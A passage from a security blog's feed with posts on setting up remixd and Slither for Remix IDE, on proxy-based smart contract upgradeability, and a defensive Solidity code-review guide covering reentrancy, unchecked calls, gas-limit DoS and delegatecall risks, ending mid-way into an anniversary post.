</b><span style="text-align: justify;">Check the remixd version and connect.</span><br /><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvhHnG9cOv5vVCBOECcONfoXX47skdAAZfkOnhJeC9VgZQ_PNXDe1w7d0SnmYgtheux1cAt7NipRR4LwuhGqcBJ83Nqo2quzR24O8Z46qJ-IGgCnPp4otQ_JovauPYPoPYNPN6pVN_FAUxJYnVBc9AkMD9mFPcbdt3o6LIp1oSt2DdMJOcMAzbPEvL/s490/Screenshot%20from%202022-07-23%2018-45-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="486" data-original-width="490" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvhHnG9cOv5vVCBOECcONfoXX47skdAAZfkOnhJeC9VgZQ_PNXDe1w7d0SnmYgtheux1cAt7NipRR4LwuhGqcBJ83Nqo2quzR24O8Z46qJ-IGgCnPp4otQ_JovauPYPoPYNPN6pVN_FAUxJYnVBc9AkMD9mFPcbdt3o6LIp1oSt2DdMJOcMAzbPEvL/w400-h396/Screenshot%20from%202022-07-23%2018-45-43.png" width="400" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note:</b> The message box pops up and you just need to read carefully and copy the command shown in the box to connect your localhost. The parameter -u in the remixd is a copy paste of the workspace you actively using (if you moved in the tab workspace).</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The remixd command for my workspace is:</div><div style="text-align: justify;"><br /></div><div style="text-align: left;"><i>remixd -s localWorkspace/ -u https://remix.ethereum.org</i></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note:</b> remixd provides full read and write access to the given folder for any application that can access the TCP port 65520 on your local host. To minimize the risk, Remixd can ONLY bridge between your filesystem and the Remix IDE URLS - including:</div><div style="text-align: justify;"><div><ul><li> https://remix.ethereum.org</li><li> https://remix-alpha.ethereum.org</li><li> https://remix-beta.ethereum.org</li><li> package://a7df6d3c223593f3550b35e90d7b0b1f.mod</li><li> package://6fd22d6fe5549ad4c4d8fd3ca0b7816b.mod</li><li> https://ipfsgw.komputing.org</li></ul></div></div><div style="text-align: justify;"><b>Note:</b> In the terminal where remixd is running, typing ctrl-c will close the session. Remix IDE will then put up a modal saying that remixd has stopped running. If you want to kill the remixd, just run killall node from the terminal you launched the tool.</div><h2 style="text-align: justify;">Remixd and Slither (automated security scans)</h2><div style="text-align: justify;">The end goal of this lengthy post is to make you able to run remotely automated scans with tools such as slither. When remixd NPM module is installed, it also installs Slither and solc-select and latest version of solc. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">If you run the following command in your Linux box, it will work 90% of the time:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><i>remixd -i slither</i></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note:</b> The command above will take care all the dependencies.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">If a project is shared through remixd and localhost workspace is loaded in Remix IDE, there will be an extra checkbox shown in Solidity Static Analysis plugin with the label:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig6U-wk5fyj3CAaj-c019ngtz19_yqCGS8j-Y8UMa5dmxmk4w06j7EX5AUdsi3ex-DX8B5QPCHkYY1-e1FkuvUmMZZrOao45-Rk90zCOXBQRuV13n9aIA6wf_xae8lRP0pQurrT69yNb5YKmU5Fz1hdKr12-abgH6WrFNcsjU01ciaYPSUqAXjSQ2d/s358/Screenshot%20from%202022-07-23%2019-45-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="355" data-original-width="358" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig6U-wk5fyj3CAaj-c019ngtz19_yqCGS8j-Y8UMa5dmxmk4w06j7EX5AUdsi3ex-DX8B5QPCHkYY1-e1FkuvUmMZZrOao45-Rk90zCOXBQRuV13n9aIA6wf_xae8lRP0pQurrT69yNb5YKmU5Fz1hdKr12-abgH6WrFNcsjU01ciaYPSUqAXjSQ2d/s320/Screenshot%20from%202022-07-23%2019-45-21.png" width="320" /></a></div><br /><div style="text-align: justify;"><b>Note:</b> When you connect to localhost, remixd will create an empty workspace. Use it to add the sol files. Also </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://external-content.duckduckgo.com/iu/?u=http%3A%2F%2Fclipground.com%2Fimages%2Fin-the-end-clipart-8.jpg&f=1&nofb=1" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="800" data-original-width="800" height="640" src="https://external-content.duckduckgo.com/iu/?u=http%3A%2F%2Fclipground.com%2Fimages%2Fin-the-end-clipart-8.jpg&f=1&nofb=1" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div><b>References:</b></div><div><br /></div><div>- <a href="https://remix.ethereum.org/" target="_blank">REMIX</a> </div><div>- <a href="https://github.com/ethereumbook/ethereumbook" target="_blank">Mastering Ethereum</a></div><div>- <a href="https://remix-ide.readthedocs.io/en/latest/#" target="_blank">Remix Docs</a></div><div>- <a href="https://github.com/ConsenSys/mythril" target="_blank">Mythril</a></div><div>- <a href="https://remix-ide.readthedocs.io/en/latest/import.html" target="_blank">Importing Libraries</a></div><div>- <a href="https://remix-ide.readthedocs.io/en/latest/static_analysis.html" target="_blank">Remix Static Analysis</a></div><div>- <a href="https://mythx.io/" target="_blank">Ethereum Security Scanner</a></div><div>- <a href="https://arvanaghi.com/blog/pentesting-ethereum-dapps/" target="_blank">Difference of DApps and Web Apps</a></div><div>- <a href="https://www.tutorialspoint.com/solidity/solidity_function_modifiers.htm" target="_blank">Modifiers Solidity</a></div><div>- <a href="https://medium.com/coinmonks/solidity-tutorial-all-about-modifiers-a86cf81c14cb" target="_blank">Modifiers Solidity</a> </div><div>- <a href="https://github.com/enderphan94/solidity-pentest/blob/master/PentestGuidline.md" target="_blank">Pentest Guides</a></div><div>- <a href="https://www.npmjs.com/package/@remix-project/remixd" target="_blank">Remix Tool</a></div><div>- <a href="https://github.com/enderphan94/solidity-pentest/blob/master/PentestGuidline.md" target="_blank">Slither Tool</a></div><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-31872537459769788432021-05-03T06:15:00.001-07:002021-05-03T06:15:45.768-07:00Solidity Smart Contract Upgradeability<h2 style="text-align: left;">Introduction </h2><div style="text-align: justify;">This article is going to focus on Smart Contract upgradability, why this important and how can we achieve it. When dealing with Smart Contracts we need to be able to upgrade our system code. This is because if security critical bugs appear , we should be able to remediate the bugs. We would also want to enhance the code and add more features. Smart Contract upgradability is not as simple as upgrading a normal software due to the blockchain immutability.</div><div style="text-align: justify;"> </div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjm_QVzitq_WsSsju5eIlOmPaWm5l_RI9vHvtWZYrnj0uUpN8x8yQlo3uFLZJTS4syRNKLRalsU3SQUc_IOcnCBKH7F4a7_FEeJukqyeAKXsKxukahke0a_26w9yaAsz_3ko4rehM7g98/s481/external-content.duckduckgo.com.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="474" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjm_QVzitq_WsSsju5eIlOmPaWm5l_RI9vHvtWZYrnj0uUpN8x8yQlo3uFLZJTS4syRNKLRalsU3SQUc_IOcnCBKH7F4a7_FEeJukqyeAKXsKxukahke0a_26w9yaAsz_3ko4rehM7g98/w394-h400/external-content.duckduckgo.com.jpg" width="394" /></a></div><div>As already mentioned by design, smart contracts are immutable. On the other hand, software
quality heavily depends on the ability to upgrade and patch source code
in order to produce iterative releases. Even though blockchain based
software profits significantly from the technology’s immutability, still
a certain degree of mutability is needed for bug fixing and potential
product improvements.</div><div> </div><h2>Preparing for Upgrades </h2><h2></h2></div><div style="text-align: left;"><div style="text-align: left;">In order to properly do the upgrade we should be focusing in the following aspects of the project:</div><div style="text-align: left;"><ul style="text-align: left;"><li>Have money management strategies in place</li><li>Create a pause functionality </li><li>Have paths to upgrades</li><ul><li>Switching addresses</li><li>Switching Oracles</li><li>Proxy contracts </li></ul></ul><p style="text-align: justify;">The mentioned functionality is mandatory in order to properly maintain and do risk management on your system. The money management strategy has to do with were and how we hold the funds and the system data. The switch address is related to the proxy contract and the rest have to do with the flow paths we designed to upgrade the smart contracts [1]. </p><p style="text-align: justify;"><br /></p><h2>Proxy Contract</h2><h2></h2><p style="text-align: justify;">The basic idea is using a proxy for upgrades. The first contract is a
simple wrapper or "proxy" which users interact with directly and is in
charge of forwarding transactions to and from the second contract, which
contains the logic. The key concept to understand is that the logic
contract can be replaced while the proxy, or the access point is never
changed. Both contracts are still immutable in the sense that their code
cannot be changed, but the logic contract can simply be swapped by
another contract. The wrapper can thus point to a different logic
implementation and in doing so, the software is "upgraded"</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8XmQvHGph0ZjizsePQQl21oS3fXqj_NoTKUM5niDcvhDGJtKP8GKHk16ee0VBYshWpo1iaivTQl0-5JNgbrJXkW-9MPzRlRZOIvj5ycKjysXxM4tlxjxqDaPxuIh1T0D8h2ZQfFSFyW4/s851/Untitled+Diagram.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="397" data-original-width="851" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8XmQvHGph0ZjizsePQQl21oS3fXqj_NoTKUM5niDcvhDGJtKP8GKHk16ee0VBYshWpo1iaivTQl0-5JNgbrJXkW-9MPzRlRZOIvj5ycKjysXxM4tlxjxqDaPxuIh1T0D8h2ZQfFSFyW4/w640-h298/Untitled+Diagram.jpg" width="640" /></a></div><br /><p style="text-align: justify;"><b>Note:</b> This abstract proxy contract provides a fallback function that delegates all calls to another contract using the EVM
instruction <code>delegatecall</code>. We refer to the second contract as the <em>implementation</em> behind the proxy, and it has to
be specified by overriding the virtual <a href="https://docs.openzeppelin.com/contracts/3.x/api/proxy#Proxy-_implementation--"><code>_implementation</code></a> function. Additionally, delegation to the implementation can be triggered manually through the <a href="https://docs.openzeppelin.com/contracts/3.x/api/proxy#Proxy-_fallback--"><code>_fallback</code></a> function, or to a
different contract through the <a href="https://docs.openzeppelin.com/contracts/3.x/api/proxy#Proxy-_delegate-address-"><code>_delegate</code></a> function. </p><p style="text-align: justify;">The most immediate problem that proxies need to solve is how the proxy
exposes the entire interface of the logic contract without requiring a
one to one mapping of the entire logic contract’s interface. That would
be difficult to maintain, prone to errors, and would make the interface
itself not upgradeable. Hence, a dynamic forwarding mechanism is required [1].</p><h2>Proxy Setup</h2><div style="text-align: justify;">Below we can see that the contract proxy has one to one relationship with all the logic contract proxy. An this is important in order to understand that this setup kind of breaks the immutability of the blockchain. <br /></div><div style="text-align: left;"> <br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrc_tbpQnNsQKaOYitPp-0BA9h1V7HDGtDJwLCL8AXFWM53InJtwF6F7EhS9p0urrqn_SSYwCSmbYjXoVQe8TxCQECi3bjyUBvmW360Mnd4DRJ51TpEmsmMTATUbusBOsXiDbJBJMq7dc/s721/Untitled+Diagram%25281%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="337" data-original-width="721" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrc_tbpQnNsQKaOYitPp-0BA9h1V7HDGtDJwLCL8AXFWM53InJtwF6F7EhS9p0urrqn_SSYwCSmbYjXoVQe8TxCQECi3bjyUBvmW360Mnd4DRJ51TpEmsmMTATUbusBOsXiDbJBJMq7dc/w640-h300/Untitled+Diagram%25281%2529.jpg" width="640" /></a></div><p><b>References:</b></p><ul style="text-align: left;"><li><b><a href="https://docs.openzeppelin.com/contracts/3.x/api/proxy" target="_blank">docs.openzeppelin.com</a> </b>[1]<br /></li></ul><p><br /></p><p><br /></p></div></div><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-18398056317176649012021-03-16T11:35:00.001-07:002021-03-16T11:35:09.274-07:00Ethereum Smart Contract Source Code Review <h2 style="text-align: justify;"> Introduction </h2><div style="text-align: justify;">As Crypto currency technologies are becoming more and more prevalent, as the time is passing by, and banks will soon start adopting them. Ethereum blockchain and other complex blockchain programs are relatively new and highly experimental. Therefore, we should expect constant changes in the security landscape, as new bugs and security risks are discovered, and new best practices are developed [1].This article is going to discuss how to perform a source code review in Ethereum Smart Contracts (SCs) and what to look for. More specifically we are going to focus in specific keywords and how to analyse them. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The points analysed are going to be:</div><div><ul style="text-align: left;"><li style="text-align: justify;">User supplied input filtering, when interacting directly with SC</li><li style="text-align: justify;">Interfacing with external SCs</li><li style="text-align: justify;">Interfacing with DApp applications</li><li style="text-align: justify;">SC formal verification</li><li style="text-align: justify;">Wallet authentication in DApp</li></ul><div style="text-align: justify;"><br /></div></div><div><h2 style="text-align: justify;">SC Programming Mindset</h2><div style="text-align: justify;">When designing an SC ecosystem (a group of SCs, constitutes an ecosystem) is it wise to have some specific concepts and security design principles in mind. SC programming requires a different engineering mindset than we may be used to. The cost of failure can be high, and change can be difficult, making it in some ways more similar to hardware programming or financial services programming than web or mobile development. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">When programming SCs we should be able to:</div><div style="text-align: justify;"><ul><li>Design carefully roll outs</li><li>Keep contracts simple and modular</li><li>Be fully aware of blockchain properties</li><li>Prepare for failure</li></ul></div><div style="text-align: justify;"><h2>Key Security Concepts For SCs Systems</h2><div><br /></div></div><div style="text-align: justify;">More specifically it is mandatory and the responsible thing to is to take into consideration the following areas:</div><div style="text-align: justify;"><ul><li>SC ecosystem monitoring e.g. monitor for unusual transactions etc.</li><li>SC ecosystem governance/admin e.g. by using proxy SC that follow best practices etc.</li><li>SC formal verification of all the SCs interacting with</li><li>SC modular/clean coding e.g. use comments and modular code etc. </li><li>SC ecosystem code auditing by an external independent 3rd party</li><li>SC ecosystem system penetration testing by an external independent 3rd party </li></ul></div><div style="text-align: justify;"><b>Note:</b> At this point we should point out that it is important that DApp smart contract interaction should also be reviewed.</div><div style="text-align: justify;"><br /></div><h2 style="text-align: justify;">SCs User Input Validation</h2><div style="text-align: justify;">Make sure you apply user input validation on a DApp and SC level. Remember that on-chain data are public and an adversary can interact with a SC directly, by simply visiting an Ethereum explorer in etherscan.io, the following screenshots demonstrate that.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Below we can see an example of a deployed contract:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8HSdyHxI-eQfP8JKKVs7-YRrpMNKRn4z7Dp1zC8jhKMAh6FDR8Ea1QhZERn2s2N_Rns_2TgOP6Dcf5zN4ndQ3XQ5XZfcjZYue2jr8uIhZEsaC59IpOvM85BFTMbc8APbaRtYH80a4gVQ/s1388/2021-03-16_18-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="687" data-original-width="1388" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8HSdyHxI-eQfP8JKKVs7-YRrpMNKRn4z7Dp1zC8jhKMAh6FDR8Ea1QhZERn2s2N_Rns_2TgOP6Dcf5zN4ndQ3XQ5XZfcjZYue2jr8uIhZEsaC59IpOvM85BFTMbc8APbaRtYH80a4gVQ/w640-h316/2021-03-16_18-24.png" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Simple by clicking in the SC link we can interact with the contract:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOvUUq-kof0qVNkJfHdTMLplmuDJGBFfOAwAggYk7rIhbJ8lW4qNrxzB1nHz1eCCi1aqkyeCRlVLY0Qrrz7OMAcq5o3QiUyoLF48FPXH7EEcT9x_76Qg7tnrwXZwY9EfICBxVmD_5p0MI/s1422/2021-03-16_18-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="463" data-original-width="1422" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOvUUq-kof0qVNkJfHdTMLplmuDJGBFfOAwAggYk7rIhbJ8lW4qNrxzB1nHz1eCCi1aqkyeCRlVLY0Qrrz7OMAcq5o3QiUyoLF48FPXH7EEcT9x_76Qg7tnrwXZwY9EfICBxVmD_5p0MI/w640-h208/2021-03-16_18-27.png" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note: </b> Above we can see the upgrade function call and various other Admin functions. Of course is not that easy to interact with them.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">It is also known that etherscan.io provides some experimental features to decompile the SC code:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHvYJ5oCRNufoE2QrJddpzmgVCPXCs3soyoX1LxhrEOeE3scALpfS_06xb63K5BYBV2prRXtGgOAQy-IceK17lG8NVQkQsBLPImYCQNjdns28YaILxD3qe3LFxvohEm5M6SfhlyVonMY4/s1388/2021-03-16_18-32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="342" data-original-width="1388" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHvYJ5oCRNufoE2QrJddpzmgVCPXCs3soyoX1LxhrEOeE3scALpfS_06xb63K5BYBV2prRXtGgOAQy-IceK17lG8NVQkQsBLPImYCQNjdns28YaILxD3qe3LFxvohEm5M6SfhlyVonMY4/w640-h158/2021-03-16_18-32.png" width="640" /></a></div><br /> If we click the decompile code we get this screen below:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1dbb2IK516JJ2qqj20CmB5Ue902yg8gIXmQ__A11QM7cWQqWUbHXJu8b6gs_qEZTuqSmqeN2nqznqNLjMgSFFF4lGZuKuREszWQ6PCt2JkJunzoFD6WHSOoRiML1nIH1svW1339Sen20/s1461/2021-03-16_18-35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="558" data-original-width="1461" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1dbb2IK516JJ2qqj20CmB5Ue902yg8gIXmQ__A11QM7cWQqWUbHXJu8b6gs_qEZTuqSmqeN2nqznqNLjMgSFFF4lGZuKuREszWQ6PCt2JkJunzoFD6WHSOoRiML1nIH1svW1339Sen20/w640-h244/2021-03-16_18-35.png" width="640" /></a></div><div><br /></div>Below we can see how a DApp or wallet can interact with a SC:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifHkxEqRzx0djh_PxOVKWZZri8GJa8RbXou16dAxc6Za0PUi5x5M0kJys8DQIhithCMk-937KfjaNyZrDI0OB8cCdnRfR3lAGIu2GaCccNUTJAvkodb0c4hKAZMgz2ZCY5b52Nevy-8Y0/s871/Untitled+Diagram+%25282%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="752" data-original-width="871" height="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifHkxEqRzx0djh_PxOVKWZZri8GJa8RbXou16dAxc6Za0PUi5x5M0kJys8DQIhithCMk-937KfjaNyZrDI0OB8cCdnRfR3lAGIu2GaCccNUTJAvkodb0c4hKAZMgz2ZCY5b52Nevy-8Y0/w640-h552/Untitled+Diagram+%25282%2529.jpg" width="640" /></a></div><br /><div><br /><div style="text-align: justify;"><div>There are five categories of Ethereum wallets that can interact with DApps:</div><div><ul><li>Browser built-in (e.g. Opera, Brave etc)</li><li>Browser extension (e.g. MetaMask )</li><li>Mobile wallets (e.g. Trust, Walleth, Pillar etc.)</li><li>Account-based web wallets (e.g. Fortmatic, 3box etc.)</li><li>Hardware wallets (e.g. Ledger, Trezor etc.)</li></ul></div></div><div style="text-align: justify;">Then there is a larger category of wallets that cannot integrate with DApps include generic wallet apps that lack the functionality to integrate with smart contracts. Different wallets have a different user experience to connect. For example, with MetaMask you get a Connect pop up. With mobile wallets, you scan a QR code. So phishing attacks take a different for e.g. an attacker can spoof a QR code, through online free QR generators etc. When assessing a DApp the architecture is of paramount importance. A user with a Metamask plugin can use it to connect to the DApp. The DApp automatically will associate the interaction with the user public key to run various tasks. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">For a Web based DApp we can use traditional filtering methods. But for SCs using Solidity we can use assert and require are as convenience functions that check for conditions (e.g. a user supplies input and the mentioned functions check if the conditions are met). In cases when conditions are not met, they throw exceptions, that we help us handle the errors.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">These are the cases when Solidity creates assert-type of exceptions when we [3]:<br /><ul><li>Invoke Solidity assert with an argument, showing false.</li><li>Invoke a zero-initialized variable of an internal function type.</li><li>Convert a large or negative value to enum.</li><li>We divide or modulo by zero.</li><li>We access an array in an index that is too big or negative.</li></ul>The require Solidity function guarantees validity of conditions that cannot be detected before execution. It checks inputs, contract state variables and return values from calls to external contracts.<br /><br /></div><div style="text-align: justify;">In the following cases, Solidity triggers a require-type of exception when [3]:<br /><ul><li>We call require with arguments that result in false.</li><li>A function called through a message does not end properly.</li><li>We create a contract with new keyword and the process does not end properly.</li><li>We target a codeless contract with an external function.</li><li>We contract gets Ether through a public getter function.</li><li>We .transfer() ends in failure.</li></ul></div><div style="text-align: justify;">Generally speaking when handling complex user input and run mathematical calculations it is mandatory to use external libraries from 3rd partyaudited code. A code project to look into would be SafeMath from <a href="https://docs.openzeppelin.com/contracts/2.x/api/math">OpenZeppelin</a>. SafeMath is a wrapper over Solidity’s arithmetic operations with added overflow checks. Arithmetic operations in Solidity wrap on overflow. This can easily result in bugs, because programmers usually assume that an overflow raises an error, which is the standard behavior in high level programming languages. SafeMath restores this intuition by reverting the transaction when an operation overflows.</div><div style="text-align: justify;"><br /></div><h2 style="text-align: left;">SC External Calls</h2></div><div><br /></div><div style="text-align: justify;">Calls to untrusted 3rd party Smart Contracts can introduce several security issues. External calls may execute malicious code in that contract or any other contract that it depends upon. As such, every external call should be treated as a potential security risk. Solidity's call function is a low-level interface for sending a message to an SC. It returns false if the subcall encounters an exception, otherwise it returns true. There is no notion of a legal call, if it compiles, it's valid Solidity.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwPgWz9jxfWREW5XCowB8p_RvK3I02egaCOK84uUtTH1CtA96CKGNok1xREVrh8umv9AEEMKFxXLW0AsOkJ0zI_NA_YlqGFzI2MOTbHw93LEF8tDJeXmq3IGJDFMPrI3efViu1vCvZmjo/s771/Untitled+Diagram+%25283%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="302" data-original-width="771" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwPgWz9jxfWREW5XCowB8p_RvK3I02egaCOK84uUtTH1CtA96CKGNok1xREVrh8umv9AEEMKFxXLW0AsOkJ0zI_NA_YlqGFzI2MOTbHw93LEF8tDJeXmq3IGJDFMPrI3efViu1vCvZmjo/w640-h250/Untitled+Diagram+%25283%2529.jpg" width="640" /></a></div><br /><div style="text-align: justify;">Especially when the return value of a message call is not checked, execution will resume even if the called contract throws an exception. If the call fails accidentally or an attacker forces the call to fail, this may cause unexpected behavior in the subsequent program logic. Always make sure to handle the possibility that the call will fail by checking the return value of that function [4].</div><div style="text-align: justify;"><br /></div><h2 style="text-align: justify;">Reentrancy (Recursive Call Attack)</h2><div style="text-align: justify;">One of the major risks of calling external contracts is that they can take over the control flow. In the reentrancy attack (a.k.a. recursive call attack) calling external contracts can take over the control flow, and make changes to your data that the calling function wasn’t expecting. A reentrancy attack occurs when the attacker drains funds from the target contract by recursively calling the target’s withdraw function [4].</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Below we can see a schematic representation:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9viAFm7HwFKEdYOZqWWmo1-AYblrPlC9mUdpXFk3jmi7jEmVa9j5O0GRvrEjVVPDqNw5c-V1ZT3TtNLL1tCpkuTsiavjuBRtS3y0TeE1BV43OC8QlWlHh7S_qVT_KnO3kszLb5AKxll0/s521/0_l7kKDrHMAVRpO-Vb.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="266" data-original-width="521" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9viAFm7HwFKEdYOZqWWmo1-AYblrPlC9mUdpXFk3jmi7jEmVa9j5O0GRvrEjVVPDqNw5c-V1ZT3TtNLL1tCpkuTsiavjuBRtS3y0TeE1BV43OC8QlWlHh7S_qVT_KnO3kszLb5AKxll0/w640-h326/0_l7kKDrHMAVRpO-Vb.jpeg" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div><div style="text-align: justify;"><b>Note:</b> For more information on this type of attack please see [4]</div></div><div style="text-align: justify;"><br /></div><h2 style="text-align: justify;">SC Denial of Service Attacks</h2><div style="text-align: justify;">Each block has an upper bound on the amount of gas that can be spent, and thus the amount computation that can be done. This is the Block Gas Limit. If the gas spent exceeds this limit, the transaction will fail. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">This leads to a couple possible Denial of Service vectors:</div><div style="text-align: justify;"><ul><li>Gas Limit DoS on a Contract via Unbounded Operations</li><li>Gas Limit DoS on the Network via Block Stuffing</li></ul></div><div style="text-align: justify;"><b>Note:</b> For more information on DoS attacks see <a href="https://consensys.github.io/smart-contract-best-practices/known_attacks/" target="_blank">consensys.github.io</a></div><div style="text-align: justify;"><br /></div><h2 style="text-align: justify;">Use Of Delegatecall/Callcode and Libraries</h2><div style="text-align: justify;"><div>According the Solidity docs [7], there exists a special variant of a message call, named delegatecall which is identical to a message call apart from the fact that the code at the target address is executed in the context of the calling contract and msg.sender and msg.value do not change their values.</div><div><br /></div><div>This means that a contract can dynamically load code from a different address at runtime. Storage, current address and balance still refer to the calling contract, only the code is taken from the called address. This makes it possible to implement the “library” feature in Solidity: Reusable library code that can be applied to a contract’s storage, e.g. in order to implement a complex data structure.</div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Improper security use of this function was the cause for the <a href="https://blog.openzeppelin.com/on-the-parity-wallet-multisig-hack-405a8c12e8f7/" target="_blank">Parity Multisig Wallet hack in 2017</a>. This function is very useful for granting our contract the ability to make calls on other contracts, as if that code were a part of our own contract. However, using delegatecall() causes all public functions from the called contract to be callable by anyone. Because this behavior was not recognized when Parity built its own custom libraries. </div><div style="text-align: justify;"><br /></div><h2 style="text-align: justify;">Epilogue </h2><div style="text-align: justify;">Writing secure smart code is a lot of work and can be very complex.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>References:</b></div><div><ul style="text-align: left;"><li style="text-align: justify;"><a href="https://consensys.github.io/smart-contract-best-practices/general_philosophy/" target="_blank">consensys.github.io</a> [1]</li><li style="text-align: justify;"><a href="https://consensys.github.io/smart-contract-best-practices/recommendations/" target="_blank">consensys.github.io</a> [2]</li><li style="text-align: justify;"><a href="https://www.bitdegree.org/learn/solidity-require#solidity-require-main-tips" target="_blank">www.bitdegree.org</a> [3]</li><li style="text-align: justify;"><a href="https://medium.com/the-capital/security-considerations-while-developing-ethereum-smart-contracts-in-solidity-aed8970341c3" target="_blank">medium.com</a> [4]</li><li style="text-align: justify;"><a href="https://ethereum.stackexchange.com/questions/8551/security-review-checklist-for-a-smart-contract" target="_blank">ethereum.stackexchange.com</a> [5]</li><li style="text-align: justify;"><a href="https://ethernaut.openzeppelin.com/level/0x4E73b858fD5D7A5fc1c3455061dE52a53F35d966">ethernaut.openzeppelin.com</a> [6]</li><li style="text-align: justify;"><a href="https://docs.soliditylang.org/en/v0.4.21/introduction-to-smart-contracts.html#delegatecall-callcode-and-libraries" target="_blank">docs.soliditylang.org</a> [7]</li></ul></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-76933619884130894662021-03-15T13:13:00.003-07:002021-03-15T13:13:30.964-07:00 Elusive Thoughts celebrates 9 years of blogging about hacking <p> <b>Elusive Thoughts celebrates 9 years of blogging about hacking </b></p><p style="text-align: justify;">Elusive Thoughts just created its first <span>non-fungible token (NFT), a digital file whose unique identity and ownership are verified on a blockchain (a digital ledger). </span></p><p></p><div class="separator" style="clear: both; text-align: center;"><a 